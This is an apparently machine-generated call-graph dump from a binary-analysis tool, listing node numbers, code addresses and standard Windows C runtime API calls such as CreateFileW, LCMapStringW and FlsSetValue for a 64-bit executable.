19729->19734 19773 7ff7ead1b224 19730->19773 19735 7ff7ead2295c 19734->19735 19736 7ff7ead191bb 19734->19736 19737 7ff7ead207e8 WideCharToMultiByte 19735->19737 19736->19711 19736->19712 19738 7ff7ead229ad 19737->19738 19739 7ff7ead229b4 FreeEnvironmentStringsW 19738->19739 19740 7ff7ead1d5fc _fread_nolock 12 API calls 19738->19740 19739->19736 19741 7ff7ead229c7 19740->19741 19742 7ff7ead229d8 19741->19742 19743 7ff7ead229cf 19741->19743 19745 7ff7ead207e8 WideCharToMultiByte 19742->19745 19744 7ff7ead1a948 __free_lconv_num 11 API calls 19743->19744 19746 7ff7ead229d6 19744->19746 19747 7ff7ead229fb 19745->19747 19746->19739 19748 7ff7ead22a09 19747->19748 19749 7ff7ead229ff 19747->19749 19751 7ff7ead1a948 __free_lconv_num 11 API calls 19748->19751 19750 7ff7ead1a948 __free_lconv_num 11 API calls 19749->19750 19752 7ff7ead22a07 FreeEnvironmentStringsW 19750->19752 19751->19752 19752->19736 19755 7ff7ead192a1 19754->19755 19756 7ff7ead1eb98 _set_fmode 11 API calls 19755->19756 19769 7ff7ead192d7 19756->19769 19757 7ff7ead192df 19758 7ff7ead1a948 __free_lconv_num 11 API calls 19757->19758 19760 7ff7ead191d7 19758->19760 19759 7ff7ead19352 19761 7ff7ead1a948 __free_lconv_num 11 API calls 19759->19761 19760->19717 19761->19760 19762 7ff7ead1eb98 _set_fmode 11 API calls 19762->19769 19763 7ff7ead19341 19922 7ff7ead194a8 19763->19922 19764 7ff7ead1a4a4 __std_exception_copy 37 API calls 19764->19769 19767 7ff7ead1a948 __free_lconv_num 11 API calls 19767->19757 19768 7ff7ead19377 19770 7ff7ead1a900 _isindst 17 API calls 19768->19770 19769->19757 19769->19759 19769->19762 19769->19763 19769->19764 19769->19768 19771 7ff7ead1a948 __free_lconv_num 11 API calls 19769->19771 19772 7ff7ead1938a 19770->19772 19771->19769 19774 7ff7ead1b250 FlsSetValue 19773->19774 19775 7ff7ead1b235 FlsGetValue 19773->19775 19777 7ff7ead1b242 19774->19777 19778 7ff7ead1b25d 19774->19778 19776 7ff7ead1b24a 19775->19776 19775->19777 19776->19774 19779 7ff7ead1b248 19777->19779 19780 7ff7ead1a504 
__GetCurrentState 45 API calls 19777->19780 19781 7ff7ead1eb98 _set_fmode 11 API calls 19778->19781 19793 7ff7ead222c4 19779->19793 19782 7ff7ead1b2c5 19780->19782 19783 7ff7ead1b26c 19781->19783 19784 7ff7ead1b28a FlsSetValue 19783->19784 19785 7ff7ead1b27a FlsSetValue 19783->19785 19786 7ff7ead1b2a8 19784->19786 19787 7ff7ead1b296 FlsSetValue 19784->19787 19788 7ff7ead1b283 19785->19788 19790 7ff7ead1aef4 _set_fmode 11 API calls 19786->19790 19787->19788 19789 7ff7ead1a948 __free_lconv_num 11 API calls 19788->19789 19789->19777 19791 7ff7ead1b2b0 19790->19791 19792 7ff7ead1a948 __free_lconv_num 11 API calls 19791->19792 19792->19779 19816 7ff7ead22534 19793->19816 19795 7ff7ead222f9 19831 7ff7ead21fc4 19795->19831 19798 7ff7ead1d5fc _fread_nolock 12 API calls 19799 7ff7ead22327 19798->19799 19800 7ff7ead2232f 19799->19800 19802 7ff7ead2233e 19799->19802 19801 7ff7ead1a948 __free_lconv_num 11 API calls 19800->19801 19814 7ff7ead22316 19801->19814 19802->19802 19838 7ff7ead2266c 19802->19838 19805 7ff7ead2243a 19806 7ff7ead14f08 _set_fmode 11 API calls 19805->19806 19807 7ff7ead2243f 19806->19807 19811 7ff7ead1a948 __free_lconv_num 11 API calls 19807->19811 19808 7ff7ead22454 19809 7ff7ead22495 19808->19809 19815 7ff7ead1a948 __free_lconv_num 11 API calls 19808->19815 19810 7ff7ead224fc 19809->19810 19849 7ff7ead21df4 19809->19849 19813 7ff7ead1a948 __free_lconv_num 11 API calls 19810->19813 19811->19814 19813->19814 19814->19729 19815->19809 19817 7ff7ead22557 19816->19817 19818 7ff7ead22561 19817->19818 19864 7ff7ead202d8 EnterCriticalSection 19817->19864 19822 7ff7ead225d3 19818->19822 19823 7ff7ead1a504 __GetCurrentState 45 API calls 19818->19823 19822->19795 19825 7ff7ead225eb 19823->19825 19827 7ff7ead22642 19825->19827 19828 7ff7ead1b224 50 API calls 19825->19828 19827->19795 19829 7ff7ead2262c 19828->19829 19830 7ff7ead222c4 65 API calls 19829->19830 19830->19827 19832 7ff7ead14f4c 45 API calls 19831->19832 19833 7ff7ead21fd8 19832->19833 19834 7ff7ead21fe4 
GetOEMCP 19833->19834 19835 7ff7ead21ff6 19833->19835 19836 7ff7ead2200b 19834->19836 19835->19836 19837 7ff7ead21ffb GetACP 19835->19837 19836->19798 19836->19814 19837->19836 19839 7ff7ead21fc4 47 API calls 19838->19839 19840 7ff7ead22699 19839->19840 19841 7ff7ead227ef 19840->19841 19843 7ff7ead226d6 IsValidCodePage 19840->19843 19848 7ff7ead226f0 __scrt_get_show_window_mode 19840->19848 19842 7ff7ead0c550 _log10_special 8 API calls 19841->19842 19844 7ff7ead22431 19842->19844 19843->19841 19845 7ff7ead226e7 19843->19845 19844->19805 19844->19808 19846 7ff7ead22716 GetCPInfo 19845->19846 19845->19848 19846->19841 19846->19848 19865 7ff7ead220dc 19848->19865 19921 7ff7ead202d8 EnterCriticalSection 19849->19921 19866 7ff7ead22119 GetCPInfo 19865->19866 19875 7ff7ead2220f 19865->19875 19867 7ff7ead2212c 19866->19867 19866->19875 19870 7ff7ead22e40 48 API calls 19867->19870 19868 7ff7ead0c550 _log10_special 8 API calls 19869 7ff7ead222ae 19868->19869 19869->19841 19871 7ff7ead221a3 19870->19871 19876 7ff7ead27b84 19871->19876 19874 7ff7ead27b84 54 API calls 19874->19875 19875->19868 19877 7ff7ead14f4c 45 API calls 19876->19877 19878 7ff7ead27ba9 19877->19878 19881 7ff7ead27850 19878->19881 19882 7ff7ead27891 19881->19882 19883 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 19882->19883 19887 7ff7ead278db 19883->19887 19884 7ff7ead27b59 19886 7ff7ead0c550 _log10_special 8 API calls 19884->19886 19885 7ff7ead27a11 19885->19884 19890 7ff7ead1a948 __free_lconv_num 11 API calls 19885->19890 19888 7ff7ead221d6 19886->19888 19887->19884 19887->19885 19889 7ff7ead1d5fc _fread_nolock 12 API calls 19887->19889 19891 7ff7ead27913 19887->19891 19888->19874 19889->19891 19890->19884 19891->19885 19892 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 19891->19892 19893 7ff7ead27986 19892->19893 19893->19885 19912 7ff7ead1f0e4 19893->19912 19896 7ff7ead27a22 19898 7ff7ead1d5fc _fread_nolock 12 API calls 19896->19898 19900 7ff7ead27af4 19896->19900 19901 7ff7ead27a40 19896->19901 
19897 7ff7ead279d1 19897->19885 19899 7ff7ead1f0e4 __crtLCMapStringW 6 API calls 19897->19899 19898->19901 19899->19885 19900->19885 19902 7ff7ead1a948 __free_lconv_num 11 API calls 19900->19902 19901->19885 19903 7ff7ead1f0e4 __crtLCMapStringW 6 API calls 19901->19903 19902->19885 19904 7ff7ead27ac0 19903->19904 19904->19900 19905 7ff7ead27ae0 19904->19905 19906 7ff7ead27af6 19904->19906 19907 7ff7ead207e8 WideCharToMultiByte 19905->19907 19908 7ff7ead207e8 WideCharToMultiByte 19906->19908 19909 7ff7ead27aee 19907->19909 19908->19909 19909->19900 19910 7ff7ead27b0e 19909->19910 19910->19885 19911 7ff7ead1a948 __free_lconv_num 11 API calls 19910->19911 19911->19885 19913 7ff7ead1ed10 __crtLCMapStringW 5 API calls 19912->19913 19914 7ff7ead1f122 19913->19914 19917 7ff7ead1f12a 19914->19917 19918 7ff7ead1f1d0 19914->19918 19916 7ff7ead1f193 LCMapStringW 19916->19917 19917->19885 19917->19896 19917->19897 19919 7ff7ead1ed10 __crtLCMapStringW 5 API calls 19918->19919 19920 7ff7ead1f1fe __crtLCMapStringW 19919->19920 19920->19916 19923 7ff7ead194ad 19922->19923 19927 7ff7ead19349 19922->19927 19924 7ff7ead194d6 19923->19924 19925 7ff7ead1a948 __free_lconv_num 11 API calls 19923->19925 19926 7ff7ead1a948 __free_lconv_num 11 API calls 19924->19926 19925->19923 19926->19927 19927->19767 19929 7ff7ead262d8 19928->19929 19930 7ff7ead262c1 19928->19930 19929->19930 19933 7ff7ead262e6 19929->19933 19931 7ff7ead14f08 _set_fmode 11 API calls 19930->19931 19932 7ff7ead262c6 19931->19932 19934 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19932->19934 19935 7ff7ead14f4c 45 API calls 19933->19935 19936 7ff7ead262d1 19933->19936 19934->19936 19935->19936 19936->19604 19938 7ff7ead14f4c 45 API calls 19937->19938 19939 7ff7ead28f71 19938->19939 19942 7ff7ead28bc8 19939->19942 19945 7ff7ead28c16 19942->19945 19943 7ff7ead0c550 _log10_special 8 API calls 19944 7ff7ead27205 19943->19944 19944->19604 19944->19631 19946 7ff7ead28c9d 19945->19946 19948 7ff7ead28c88 GetCPInfo 
19945->19948 19951 7ff7ead28ca1 19945->19951 19947 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 19946->19947 19946->19951 19949 7ff7ead28d35 19947->19949 19948->19946 19948->19951 19950 7ff7ead1d5fc _fread_nolock 12 API calls 19949->19950 19949->19951 19952 7ff7ead28d6c 19949->19952 19950->19952 19951->19943 19952->19951 19953 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 19952->19953 19954 7ff7ead28dda 19953->19954 19955 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 19954->19955 19965 7ff7ead28ebc 19954->19965 19957 7ff7ead28e00 19955->19957 19956 7ff7ead1a948 __free_lconv_num 11 API calls 19956->19951 19958 7ff7ead1d5fc _fread_nolock 12 API calls 19957->19958 19959 7ff7ead28e2d 19957->19959 19957->19965 19958->19959 19960 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 19959->19960 19959->19965 19961 7ff7ead28ea4 19960->19961 19962 7ff7ead28eaa 19961->19962 19963 7ff7ead28ec4 19961->19963 19962->19965 19967 7ff7ead1a948 __free_lconv_num 11 API calls 19962->19967 19971 7ff7ead1ef68 19963->19971 19965->19951 19965->19956 19967->19965 19968 7ff7ead28f03 19968->19951 19970 7ff7ead1a948 __free_lconv_num 11 API calls 19968->19970 19969 7ff7ead1a948 __free_lconv_num 11 API calls 19969->19968 19970->19951 19972 7ff7ead1ed10 __crtLCMapStringW 5 API calls 19971->19972 19973 7ff7ead1efa6 19972->19973 19974 7ff7ead1f1d0 __crtLCMapStringW 5 API calls 19973->19974 19976 7ff7ead1efae 19973->19976 19975 7ff7ead1f017 CompareStringW 19974->19975 19975->19976 19976->19968 19976->19969 19978 7ff7ead27c5a HeapSize 19977->19978 19979 7ff7ead27c41 19977->19979 19980 7ff7ead14f08 _set_fmode 11 API calls 19979->19980 19981 7ff7ead27c46 19980->19981 19982 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19981->19982 19983 7ff7ead27c51 19982->19983 19983->19638 19985 7ff7ead27c89 19984->19985 19986 7ff7ead27c93 19984->19986 19987 7ff7ead1d5fc _fread_nolock 12 API calls 19985->19987 19988 7ff7ead27c98 19986->19988 19994 7ff7ead27c9f _set_fmode 19986->19994 19992 7ff7ead27c91 
19987->19992 19989 7ff7ead1a948 __free_lconv_num 11 API calls 19988->19989 19989->19992 19990 7ff7ead27cd2 HeapReAlloc 19990->19992 19990->19994 19991 7ff7ead27ca5 19993 7ff7ead14f08 _set_fmode 11 API calls 19991->19993 19992->19640 19993->19992 19994->19990 19994->19991 19995 7ff7ead23590 _set_fmode 2 API calls 19994->19995 19995->19994 19997 7ff7ead1ed10 __crtLCMapStringW 5 API calls 19996->19997 19998 7ff7ead1ef44 19997->19998 19998->19645 20000 7ff7ead154fa 19999->20000 20001 7ff7ead154d6 19999->20001 20002 7ff7ead154ff 20000->20002 20003 7ff7ead15554 20000->20003 20005 7ff7ead1a948 __free_lconv_num 11 API calls 20001->20005 20008 7ff7ead154e5 20001->20008 20006 7ff7ead15514 20002->20006 20002->20008 20009 7ff7ead1a948 __free_lconv_num 11 API calls 20002->20009 20004 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 20003->20004 20016 7ff7ead15570 20004->20016 20005->20008 20010 7ff7ead1d5fc _fread_nolock 12 API calls 20006->20010 20007 7ff7ead15577 GetLastError 20011 7ff7ead14e7c _fread_nolock 11 API calls 20007->20011 20008->19648 20008->19649 20009->20006 20010->20008 20014 7ff7ead15584 20011->20014 20012 7ff7ead155b2 20012->20008 20013 7ff7ead1f8a0 _fread_nolock MultiByteToWideChar 20012->20013 20017 7ff7ead155f6 20013->20017 20018 7ff7ead14f08 _set_fmode 11 API calls 20014->20018 20015 7ff7ead155a5 20020 7ff7ead1d5fc _fread_nolock 12 API calls 20015->20020 20016->20007 20016->20012 20016->20015 20019 7ff7ead1a948 __free_lconv_num 11 API calls 20016->20019 20017->20007 20017->20008 20018->20008 20019->20015 20020->20012 20022 7ff7ead19225 20021->20022 20033 7ff7ead19221 20021->20033 20042 7ff7ead22a3c GetEnvironmentStringsW 20022->20042 20025 7ff7ead1923e 20049 7ff7ead1938c 20025->20049 20026 7ff7ead19232 20027 7ff7ead1a948 __free_lconv_num 11 API calls 20026->20027 20027->20033 20030 7ff7ead1a948 __free_lconv_num 11 API calls 20031 7ff7ead19265 20030->20031 20032 7ff7ead1a948 __free_lconv_num 11 API calls 20031->20032 20032->20033 20033->19677 20034 
7ff7ead195cc 20033->20034 20035 7ff7ead195ef 20034->20035 20040 7ff7ead19606 20034->20040 20035->19677 20036 7ff7ead1f8a0 MultiByteToWideChar _fread_nolock 20036->20040 20037 7ff7ead1eb98 _set_fmode 11 API calls 20037->20040 20038 7ff7ead1967a 20039 7ff7ead1a948 __free_lconv_num 11 API calls 20038->20039 20039->20035 20040->20035 20040->20036 20040->20037 20040->20038 20041 7ff7ead1a948 __free_lconv_num 11 API calls 20040->20041 20041->20040 20043 7ff7ead22a60 20042->20043 20044 7ff7ead1922a 20042->20044 20045 7ff7ead1d5fc _fread_nolock 12 API calls 20043->20045 20044->20025 20044->20026 20046 7ff7ead22a97 memcpy_s 20045->20046 20047 7ff7ead1a948 __free_lconv_num 11 API calls 20046->20047 20048 7ff7ead22ab7 FreeEnvironmentStringsW 20047->20048 20048->20044 20050 7ff7ead193b4 20049->20050 20051 7ff7ead1eb98 _set_fmode 11 API calls 20050->20051 20062 7ff7ead193ef 20051->20062 20052 7ff7ead193f7 20053 7ff7ead1a948 __free_lconv_num 11 API calls 20052->20053 20054 7ff7ead19246 20053->20054 20054->20030 20055 7ff7ead19471 20056 7ff7ead1a948 __free_lconv_num 11 API calls 20055->20056 20056->20054 20057 7ff7ead1eb98 _set_fmode 11 API calls 20057->20062 20058 7ff7ead19460 20060 7ff7ead194a8 11 API calls 20058->20060 20059 7ff7ead20474 37 API calls 20059->20062 20061 7ff7ead19468 20060->20061 20064 7ff7ead1a948 __free_lconv_num 11 API calls 20061->20064 20062->20052 20062->20055 20062->20057 20062->20058 20062->20059 20063 7ff7ead19494 20062->20063 20066 7ff7ead1a948 __free_lconv_num 11 API calls 20062->20066 20065 7ff7ead1a900 _isindst 17 API calls 20063->20065 20064->20052 20067 7ff7ead194a6 20065->20067 20066->20062 20069 7ff7ead28b31 __crtLCMapStringW 20068->20069 20070 7ff7ead270ee 20069->20070 20071 7ff7ead1ef68 6 API calls 20069->20071 20070->19702 20070->19704 20071->20070 19061 7ff7ead1afd0 19062 7ff7ead1afea 19061->19062 19063 7ff7ead1afd5 19061->19063 19067 7ff7ead1aff0 19063->19067 19068 7ff7ead1b032 19067->19068 19071 7ff7ead1b03a 19067->19071 19069 7ff7ead1a948 
__free_lconv_num 11 API calls 19068->19069 19069->19071 19070 7ff7ead1a948 __free_lconv_num 11 API calls 19072 7ff7ead1b047 19070->19072 19071->19070 19073 7ff7ead1a948 __free_lconv_num 11 API calls 19072->19073 19074 7ff7ead1b054 19073->19074 19075 7ff7ead1a948 __free_lconv_num 11 API calls 19074->19075 19076 7ff7ead1b061 19075->19076 19077 7ff7ead1a948 __free_lconv_num 11 API calls 19076->19077 19078 7ff7ead1b06e 19077->19078 19079 7ff7ead1a948 __free_lconv_num 11 API calls 19078->19079 19080 7ff7ead1b07b 19079->19080 19081 7ff7ead1a948 __free_lconv_num 11 API calls 19080->19081 19082 7ff7ead1b088 19081->19082 19083 7ff7ead1a948 __free_lconv_num 11 API calls 19082->19083 19084 7ff7ead1b095 19083->19084 19085 7ff7ead1a948 __free_lconv_num 11 API calls 19084->19085 19086 7ff7ead1b0a5 19085->19086 19087 7ff7ead1a948 __free_lconv_num 11 API calls 19086->19087 19088 7ff7ead1b0b5 19087->19088 19093 7ff7ead1ae94 19088->19093 19107 7ff7ead202d8 EnterCriticalSection 19093->19107 19248 7ff7ead19d50 19251 7ff7ead19ccc 19248->19251 19258 7ff7ead202d8 EnterCriticalSection 19251->19258 19262 7ff7ead0cb50 19263 7ff7ead0cb60 19262->19263 19279 7ff7ead19ba8 19263->19279 19265 7ff7ead0cb6c 19285 7ff7ead0ce48 19265->19285 19267 7ff7ead0cb84 _RTC_Initialize 19277 7ff7ead0cbd9 19267->19277 19290 7ff7ead0cff8 19267->19290 19268 7ff7ead0d12c 7 API calls 19269 7ff7ead0cc05 19268->19269 19271 7ff7ead0cb99 19293 7ff7ead19014 19271->19293 19277->19268 19278 7ff7ead0cbf5 19277->19278 19280 7ff7ead19bb9 19279->19280 19281 7ff7ead19bc1 19280->19281 19282 7ff7ead14f08 _set_fmode 11 API calls 19280->19282 19281->19265 19283 7ff7ead19bd0 19282->19283 19284 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19283->19284 19284->19281 19286 7ff7ead0ce59 19285->19286 19289 7ff7ead0ce5e __scrt_acquire_startup_lock 19285->19289 19287 7ff7ead0d12c 7 API calls 19286->19287 19286->19289 19288 7ff7ead0ced2 19287->19288 19289->19267 19318 7ff7ead0cfbc 19290->19318 19292 7ff7ead0d001 19292->19271 19294 
7ff7ead19034 19293->19294 19301 7ff7ead0cba5 19293->19301 19295 7ff7ead1903c 19294->19295 19296 7ff7ead19052 GetModuleFileNameW 19294->19296 19297 7ff7ead14f08 _set_fmode 11 API calls 19295->19297 19300 7ff7ead1907d 19296->19300 19298 7ff7ead19041 19297->19298 19299 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19298->19299 19299->19301 19333 7ff7ead18fb4 19300->19333 19301->19277 19317 7ff7ead0d0cc InitializeSListHead 19301->19317 19304 7ff7ead190c5 19305 7ff7ead14f08 _set_fmode 11 API calls 19304->19305 19306 7ff7ead190ca 19305->19306 19309 7ff7ead1a948 __free_lconv_num 11 API calls 19306->19309 19307 7ff7ead190ff 19310 7ff7ead1a948 __free_lconv_num 11 API calls 19307->19310 19308 7ff7ead190dd 19308->19307 19311 7ff7ead1912b 19308->19311 19312 7ff7ead19144 19308->19312 19309->19301 19310->19301 19313 7ff7ead1a948 __free_lconv_num 11 API calls 19311->19313 19314 7ff7ead1a948 __free_lconv_num 11 API calls 19312->19314 19315 7ff7ead19134 19313->19315 19314->19307 19316 7ff7ead1a948 __free_lconv_num 11 API calls 19315->19316 19316->19301 19319 7ff7ead0cfd6 19318->19319 19321 7ff7ead0cfcf 19318->19321 19322 7ff7ead1a1ec 19319->19322 19321->19292 19325 7ff7ead19e28 19322->19325 19332 7ff7ead202d8 EnterCriticalSection 19325->19332 19334 7ff7ead19004 19333->19334 19335 7ff7ead18fcc 19333->19335 19334->19304 19334->19308 19335->19334 19336 7ff7ead1eb98 _set_fmode 11 API calls 19335->19336 19337 7ff7ead18ffa 19336->19337 19338 7ff7ead1a948 __free_lconv_num 11 API calls 19337->19338 19338->19334 19339 7ff7ead1c520 19350 7ff7ead202d8 EnterCriticalSection 19339->19350 15899 7ff7ead15628 15900 7ff7ead1565f 15899->15900 15901 7ff7ead15642 15899->15901 15900->15901 15903 7ff7ead15672 CreateFileW 15900->15903 15924 7ff7ead14ee8 15901->15924 15905 7ff7ead156dc 15903->15905 15906 7ff7ead156a6 15903->15906 15959 7ff7ead15c04 15905->15959 15933 7ff7ead1577c GetFileType 15906->15933 15913 7ff7ead15710 15985 7ff7ead159c4 15913->15985 15914 7ff7ead156e5 15980 7ff7ead14e7c 
15914->15980 15916 7ff7ead156bb CloseHandle 15919 7ff7ead1565a 15916->15919 15917 7ff7ead156d1 CloseHandle 15917->15919 15923 7ff7ead156ef 15923->15919 16002 7ff7ead1b2c8 GetLastError 15924->16002 15926 7ff7ead14ef1 15927 7ff7ead14f08 15926->15927 15928 7ff7ead1b2c8 _set_fmode 11 API calls 15927->15928 15929 7ff7ead14f11 15928->15929 15930 7ff7ead1a8e0 15929->15930 16060 7ff7ead1a778 15930->16060 15932 7ff7ead1a8f9 15932->15919 15934 7ff7ead15887 15933->15934 15935 7ff7ead157ca 15933->15935 15937 7ff7ead1588f 15934->15937 15938 7ff7ead158b1 15934->15938 15936 7ff7ead157f6 GetFileInformationByHandle 15935->15936 15940 7ff7ead15b00 21 API calls 15935->15940 15941 7ff7ead1581f 15936->15941 15942 7ff7ead158a2 GetLastError 15936->15942 15937->15942 15943 7ff7ead15893 15937->15943 15939 7ff7ead158d4 PeekNamedPipe 15938->15939 15957 7ff7ead15872 15938->15957 15939->15957 15948 7ff7ead157e4 15940->15948 15945 7ff7ead159c4 51 API calls 15941->15945 15944 7ff7ead14e7c _fread_nolock 11 API calls 15942->15944 15946 7ff7ead14f08 _set_fmode 11 API calls 15943->15946 15944->15957 15949 7ff7ead1582a 15945->15949 15946->15957 15947 7ff7ead0c550 _log10_special 8 API calls 15950 7ff7ead156b4 15947->15950 15948->15936 15948->15957 16126 7ff7ead15924 15949->16126 15950->15916 15950->15917 15953 7ff7ead15924 10 API calls 15954 7ff7ead15849 15953->15954 15955 7ff7ead15924 10 API calls 15954->15955 15956 7ff7ead1585a 15955->15956 15956->15957 15958 7ff7ead14f08 _set_fmode 11 API calls 15956->15958 15957->15947 15958->15957 15960 7ff7ead15c3a 15959->15960 15961 7ff7ead14f08 _set_fmode 11 API calls 15960->15961 15979 7ff7ead15cd2 __vcrt_freefls 15960->15979 15963 7ff7ead15c4c 15961->15963 15962 7ff7ead0c550 _log10_special 8 API calls 15964 7ff7ead156e1 15962->15964 15965 7ff7ead14f08 _set_fmode 11 API calls 15963->15965 15964->15913 15964->15914 15966 7ff7ead15c54 15965->15966 16133 7ff7ead17e08 15966->16133 15968 7ff7ead15c69 15969 7ff7ead15c7b 15968->15969 15970 7ff7ead15c71 15968->15970 
15972 7ff7ead14f08 _set_fmode 11 API calls 15969->15972 15971 7ff7ead14f08 _set_fmode 11 API calls 15970->15971 15976 7ff7ead15c76 15971->15976 15973 7ff7ead15c80 15972->15973 15974 7ff7ead14f08 _set_fmode 11 API calls 15973->15974 15973->15979 15975 7ff7ead15c8a 15974->15975 15977 7ff7ead17e08 45 API calls 15975->15977 15978 7ff7ead15cc4 GetDriveTypeW 15976->15978 15976->15979 15977->15976 15978->15979 15979->15962 15981 7ff7ead1b2c8 _set_fmode 11 API calls 15980->15981 15982 7ff7ead14e89 __free_lconv_num 15981->15982 15983 7ff7ead1b2c8 _set_fmode 11 API calls 15982->15983 15984 7ff7ead14eab 15983->15984 15984->15923 15987 7ff7ead159ec 15985->15987 15986 7ff7ead1571d 15995 7ff7ead15b00 15986->15995 15987->15986 16227 7ff7ead1f724 15987->16227 15989 7ff7ead15a80 15989->15986 15990 7ff7ead1f724 51 API calls 15989->15990 15991 7ff7ead15a93 15990->15991 15991->15986 15992 7ff7ead1f724 51 API calls 15991->15992 15993 7ff7ead15aa6 15992->15993 15993->15986 15994 7ff7ead1f724 51 API calls 15993->15994 15994->15986 15996 7ff7ead15b1a 15995->15996 15997 7ff7ead15b51 15996->15997 15998 7ff7ead15b2a 15996->15998 15999 7ff7ead1f5b8 21 API calls 15997->15999 16000 7ff7ead14e7c _fread_nolock 11 API calls 15998->16000 16001 7ff7ead15b3a 15998->16001 15999->16001 16000->16001 16001->15923 16003 7ff7ead1b309 FlsSetValue 16002->16003 16009 7ff7ead1b2ec 16002->16009 16004 7ff7ead1b31b 16003->16004 16008 7ff7ead1b2f9 SetLastError 16003->16008 16019 7ff7ead1eb98 16004->16019 16008->15926 16009->16003 16009->16008 16010 7ff7ead1b348 FlsSetValue 16013 7ff7ead1b354 FlsSetValue 16010->16013 16014 7ff7ead1b366 16010->16014 16011 7ff7ead1b338 FlsSetValue 16012 7ff7ead1b341 16011->16012 16026 7ff7ead1a948 16012->16026 16013->16012 16032 7ff7ead1aef4 16014->16032 16024 7ff7ead1eba9 _set_fmode 16019->16024 16020 7ff7ead1ebfa 16023 7ff7ead14f08 _set_fmode 10 API calls 16020->16023 16021 7ff7ead1ebde HeapAlloc 16022 7ff7ead1b32a 16021->16022 16021->16024 16022->16010 16022->16011 16023->16022 
16024->16020 16024->16021 16037 7ff7ead23590 16024->16037 16027 7ff7ead1a94d RtlFreeHeap 16026->16027 16028 7ff7ead1a97c 16026->16028 16027->16028 16029 7ff7ead1a968 GetLastError 16027->16029 16028->16008 16030 7ff7ead1a975 __free_lconv_num 16029->16030 16031 7ff7ead14f08 _set_fmode 9 API calls 16030->16031 16031->16028 16046 7ff7ead1adcc 16032->16046 16040 7ff7ead235d0 16037->16040 16045 7ff7ead202d8 EnterCriticalSection 16040->16045 16058 7ff7ead202d8 EnterCriticalSection 16046->16058 16061 7ff7ead1a7a3 16060->16061 16064 7ff7ead1a814 16061->16064 16063 7ff7ead1a7ca 16063->15932 16074 7ff7ead1a55c 16064->16074 16069 7ff7ead1a84f 16069->16063 16075 7ff7ead1a578 GetLastError 16074->16075 16076 7ff7ead1a5b3 16074->16076 16077 7ff7ead1a588 16075->16077 16076->16069 16080 7ff7ead1a5c8 16076->16080 16087 7ff7ead1b390 16077->16087 16081 7ff7ead1a5fc 16080->16081 16082 7ff7ead1a5e4 GetLastError SetLastError 16080->16082 16081->16069 16083 7ff7ead1a900 IsProcessorFeaturePresent 16081->16083 16082->16081 16084 7ff7ead1a913 16083->16084 16104 7ff7ead1a614 16084->16104 16088 7ff7ead1b3ca FlsSetValue 16087->16088 16089 7ff7ead1b3af FlsGetValue 16087->16089 16091 7ff7ead1b3d7 16088->16091 16094 7ff7ead1a5a3 SetLastError 16088->16094 16090 7ff7ead1b3c4 16089->16090 16089->16094 16090->16088 16092 7ff7ead1eb98 _set_fmode 11 API calls 16091->16092 16093 7ff7ead1b3e6 16092->16093 16095 7ff7ead1b404 FlsSetValue 16093->16095 16096 7ff7ead1b3f4 FlsSetValue 16093->16096 16094->16076 16098 7ff7ead1b410 FlsSetValue 16095->16098 16099 7ff7ead1b422 16095->16099 16097 7ff7ead1b3fd 16096->16097 16100 7ff7ead1a948 __free_lconv_num 11 API calls 16097->16100 16098->16097 16101 7ff7ead1aef4 _set_fmode 11 API calls 16099->16101 16100->16094 16102 7ff7ead1b42a 16101->16102 16103 7ff7ead1a948 __free_lconv_num 11 API calls 16102->16103 16103->16094 16105 7ff7ead1a64e _isindst __scrt_get_show_window_mode 16104->16105 16106 7ff7ead1a676 RtlCaptureContext RtlLookupFunctionEntry 16105->16106 16107 
7ff7ead1a6b0 RtlVirtualUnwind 16106->16107 16108 7ff7ead1a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16106->16108 16107->16108 16109 7ff7ead1a738 _isindst 16108->16109 16112 7ff7ead0c550 16109->16112 16113 7ff7ead0c559 16112->16113 16114 7ff7ead0c8e0 IsProcessorFeaturePresent 16113->16114 16115 7ff7ead0c564 GetCurrentProcess TerminateProcess 16113->16115 16116 7ff7ead0c8f8 16114->16116 16121 7ff7ead0cad8 RtlCaptureContext 16116->16121 16122 7ff7ead0caf2 RtlLookupFunctionEntry 16121->16122 16123 7ff7ead0cb08 RtlVirtualUnwind 16122->16123 16124 7ff7ead0c90b 16122->16124 16123->16122 16123->16124 16125 7ff7ead0c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16124->16125 16127 7ff7ead1594d FileTimeToSystemTime 16126->16127 16128 7ff7ead15940 16126->16128 16129 7ff7ead15948 16127->16129 16130 7ff7ead15961 SystemTimeToTzSpecificLocalTime 16127->16130 16128->16127 16128->16129 16131 7ff7ead0c550 _log10_special 8 API calls 16129->16131 16130->16129 16132 7ff7ead15839 16131->16132 16132->15953 16134 7ff7ead17e92 16133->16134 16135 7ff7ead17e24 16133->16135 16170 7ff7ead207c0 16134->16170 16135->16134 16136 7ff7ead17e29 16135->16136 16138 7ff7ead17e5e 16136->16138 16139 7ff7ead17e41 16136->16139 16153 7ff7ead17c4c GetFullPathNameW 16138->16153 16145 7ff7ead17bd8 GetFullPathNameW 16139->16145 16144 7ff7ead17e56 __vcrt_freefls 16144->15968 16146 7ff7ead17bfe GetLastError 16145->16146 16147 7ff7ead17c14 16145->16147 16148 7ff7ead14e7c _fread_nolock 11 API calls 16146->16148 16150 7ff7ead14f08 _set_fmode 11 API calls 16147->16150 16152 7ff7ead17c10 16147->16152 16149 7ff7ead17c0b 16148->16149 16151 7ff7ead14f08 _set_fmode 11 API calls 16149->16151 16150->16152 16151->16152 16152->16144 16154 7ff7ead17c7f GetLastError 16153->16154 16159 7ff7ead17c95 __vcrt_freefls 16153->16159 16155 7ff7ead14e7c _fread_nolock 11 API calls 16154->16155 16156 7ff7ead17c8c 16155->16156 16157 7ff7ead14f08 _set_fmode 11 API 
